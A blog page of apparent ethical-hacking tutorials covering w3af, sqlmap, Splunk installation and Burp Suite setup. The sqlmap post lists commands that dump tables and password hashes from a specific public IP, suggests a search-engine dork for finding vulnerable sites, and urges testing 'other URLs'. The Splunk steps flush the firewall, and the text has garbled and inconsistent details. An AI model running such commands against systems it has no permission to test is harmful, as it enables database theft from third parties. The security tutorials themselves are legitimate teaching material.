Posts in Blog

W3af

July 1st, 2019 Posted by Blog, Members Only 0 thoughts on “W3af”

It is important to always do safety tests, and we think we should create our own tools. But there are many tools created by other people that can facilitate our checks, one of them is w3af.

what is w3af?

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

what can we do?

  1. Exploiting Web application vulnerabilities
  2. Scan REST APIs
  3. Web Application Payloads
  4. Metasploit integration

installation

git clone https://github.com/andresriancho/w3af.git

cd w3af/
./w3af_console
./tmp/w3af_dependency_install.sh

How is it used?

command to start the console

./w3af_console

The vast majority of which you can use by the terminal has this help command.

help

W3AF contains a series of utilities that support the process of discovery and exploitation of vulnerabilities, all these utilities are located in <W3AF_DIR> / tools.

gencc

Generate valid credit card numbers

cd tool
ls

./gencc -t mastercard

./gencc -t visa16

urldecode

Try decoding a given URL, often used to decode URLs in plain text ASCII format

./urldecode -d http%3A%2F%2Flocalhost%2Fw3af

Resources:

docs.w3af.org

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

SQLMAP

June 20th, 2019 Posted by Blog, Members Only 0 thoughts on “SQLMAP”

For all developers, programmers, and ethical hacking, it is essential always to protect your data and the data that is hosted on the network.  This is why SQL is a tool developed in python to perform SQL code injection automatically. Its objective is to detect and take advantage of SQL injection vulnerabilities in web applications, This tool has a powerful detection engine, various functions for the best penetration tester and a wide range of switches that go from the fingerprinting of the database, on obtaining data from the database, to the access to the underlying file system and the execution of commands in the operating system through external means — band connections.

SQLMAP manages to support various engines in databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, Firebird, Sybase, SAP MaxDB.

Within the main features of this tool can be found as excellent support of six SQL injection techniques: blind-based Boolean, blind based on time, based on errors, UNION query, stacked and out-of-band queries

This is a tool with many functionalities and features that allow the user the possibility to also support for the download and upload of the system files with files underlying the database server when the MySQL database software, PostgreSQL or Microsoft SQL Server.

Within the process of running SQLMA to find a website with genetic vulnerability, there is a straightforward way, and it is merely to place in the search engine of your choice as google the following commands section.php? Id = resulting in all the fragile web access.

How is it used?

Installation

sudo apt-get install sqlmap

or

pip install sqlmap

sqlmap

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -b

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db

other tests

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
I recommend you to test with other URLs and analyze the results.
Resources:

http://sqlmap.org/

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Installing Splunk on the Ubuntu VM

May 12th, 2019 Posted by Blog, Members Only 0 thoughts on “Installing Splunk on the Ubuntu VM”

If you are one of those people who like the issues related to ethical hacking, then Splunk tines are part of your list of tools. In this blog we will tell you how you can install them.

Installing Splunk on the Ubuntu VM

You can go to the following link and download and create your own virtual machine.

https://www.ubuntu.com/download

 

The first step to start using Splunk in Ubuntu VM is to download the Deb file, to do this we have to use the wget command to download the file directly from the official website.  It should look like this:

wget -c  -O splunklight.deb  \ (Enter)

 

‘https://www.splunk.com/bin/splunk/DownloadsActivityServlet?architecture=x86_64&platform=linux&version=6.5.0&product=splunk_light&filename=splunklight-6.5.0-59c8927def0f-linux-2.6-amd64.deb&wget=true’

Once you’ve downloaded the Deb file, upload the file to your Ubuntu server and place it a temporary directory.

After that we can use the following commands to look for an update that our system may require to run Splunk without problems:

sudo 'which iptables' -F&&\
sudo apt-get update &&\
sudo apt-get upgrade -y

After that, the run process can be executed through the dpkg command to install the Splunk server. The filename of the .deb file may change as new versions are made available so make sure that you have downloaded it.

sudo dpkg -i splunklight.deb

The log that appears at the end on the unpacking is caused by a previous version of Splunk on the system it shouldn’t cause troubles while installing Splunk. Next, we need to create the init. D script so that we can quickly start and stop Splunk.

The  default Splunk directory can be changed and run the executable file with the commands shown below:

cd /opt/splunk/bin/
sudo ./splunk enable boot-start

Once you have applied these commands, you can press SPACE to view all of the license agreement and then pulse Y to accept it. You have to use the service command shown below to Start Splunk

This command should be executed to start Splunk:

sudo service splunk start

Now you have begun Splunk Point on your browser at (as a recommendation is better to access another website before engaging Splunk GUI)

http://localhost:8000/. Open the URL in the browser and log in with the below details:

User Name: admin

Password: changeme

You now have your Splunk installation up and running. What’s required next is to get data from your various applications, logs, and monitoring tools into Splunk.

Now we have these statistics, the next step is to import them into another platform for visualization purposes. We recommend continuing reading through the next module which explains the downloading, installing and configuring process for Splunk Forwarder.

Resources:

https://www.splunk.com/

If you are interested in learning more about Splunk, we invite you to review this course.

Advanced Threat Hunting With Splunk

Try Certified Ethical Hacker for FREE!!!

 

Burp Suite

May 11th, 2019 Posted by Blog, Members Only 0 thoughts on “Burp Suite”
Welcome to the introductory tutorial to Burp Suite. It provides details about the installation and usage of Burp Suite. Burp Suite is an essential tool for bug hunters and web application pentesters.

Burp Suite logo

Installing JAVA

In Ubuntu open the terminal then run:

sudo add-apt-repository ppa:webupd8team/java

sudo apt-get update

sudo apt-get install oracle-java8-installer

Install Foxyproxy

Foxyproxy for Firefox

Download links are:

Click on Foxyproxy’s icon and click “Options”:

FoxyProxy edit tabClick “Add new proxy”.  In the “Proxy details” section → “Manual Proxy Configuration” insert the following values for Server and Port:

  • Server: 127.0.0.1
  • Port: 8080

In the “General” section, give the proxy a name and select a color. Then save.

Now start the proxy you just created by right-clicking on the Foxyproxy icon and selecting the newly created proxy.

Burp Suite – How To

Starting Up Burp Suite

Double-click on Burp executable to start it. On Linux double-click the jar file or download the plain jar file, and run it from the terminal:

java -jar burpsuite_community_v1.7.33.jar

Note. Your version may have a different version number.

Start Burp Suite with default settings.

Proxy

The proxy intercepts requests from the web browser. Requests can be modified in real time or can also be viewed in connection with their responses in the “HTTP history” tab.

Click “Proxy” > “Intercept” > “Intercept On” this will stop requests intercepting.

Burp Suite intercept tab

Once the page is open in the web browser when “intercept is on,” Burp will display the request sent from your browser until you press “forward” or if “intercept is on” is enabled. Unless the request to the web application server will not be forwarder henceforth, no response will be received. We can see the web browser waiting for the response to be initiated. Since Burp suite yet has not initiated the send request.

If the intercept is on and you do not want to send the request forward, click “drop.” Requests will not be sent to the destination. “drop” tab also enables to inspect the request and then drop it once when done. For example, the request will be intercepted by clicking on “submit” button on the target site. The request will be made available immediately in the repeater side “action” → “Send to repeater” which then “drop”. 

Proxy Options

To see the proxy settings, Click “Proxy” → “Optionsauthorized

FoxyProxy options tab

As you can see the default port used by Burp for its proxy is port 8080. Choose the same for Foxyproxy. You can have multiple proxies; you need to make sure that the ports in Burp and Foxyproxy match.

To conclude:

The Foxy Proxy configuration: IP: 127.0.0.1 Port: 1337, must be similar to the same configuration in Burp Proxy, IP: 127.0.0.1 Port: 1337. The communication protocol works as follows:

  • The target site is browsed by the user;
  • Foxy Proxy and Burp are configured with the same IP and Port as explained above;
  • Foxy Proxy is on; then Burp Proxy is on;
  •  Every single request made by the user sends it corresponding to the proxy’s IP, and port  is taken by Foxy Proxy ( in this case Burp’s proxy);
  • Intercepted request by the Burp Proxy is stored in the HTTP History;
  • Concurrently, Burp also forwards the request to the destination web application server and waits for a reply
  • Once the web server is initiated to send back a response, Burp forwards the response to the Browser.

Foxy Proxy ensures that all the initiated requests are sent to Burp’s Proxy.

Resources:

https://portswigger.net/burp

If you are interested in learning more, we invite you to review this course.

Burp Suite Workshop

Try Certified Ethical Hacker for FREE!!!